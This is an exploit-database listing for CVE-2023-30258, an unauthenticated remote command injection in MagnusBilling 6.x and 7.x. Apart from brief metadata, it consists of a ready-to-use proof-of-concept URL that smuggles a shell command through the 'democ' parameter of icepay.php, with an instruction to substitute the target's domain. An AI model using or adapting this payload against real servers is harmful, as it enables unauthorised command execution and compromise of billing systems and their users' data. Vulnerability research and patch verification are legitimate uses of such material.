Exploit for MagnusBilling 6.x / 7.x Command Injection CVE-2023-30258

Name: Exploit for MagnusBilling 6.x / 7.x Command Injection CVE-2023-30258
Rating: 5 (69 reviews)

2025-04-11 | CVSS 9.8

## https://sploitus.com/exploit?id=PACKETSTORM:190424
# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://github.com/magnussolution/magnusbilling7]
    # Software Link: [https://github.com/magnussolution/magnusbilling7]
    # Version: [7.3.0] 
    # Tested on: [Centos]
    # CVE : [CVE-2023-30258]
    
    PoC:
    # PoC URL for Command Injection
    http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
    Result: This PoC attempts to inject the id command.
    
    [Replace Your Domain Name]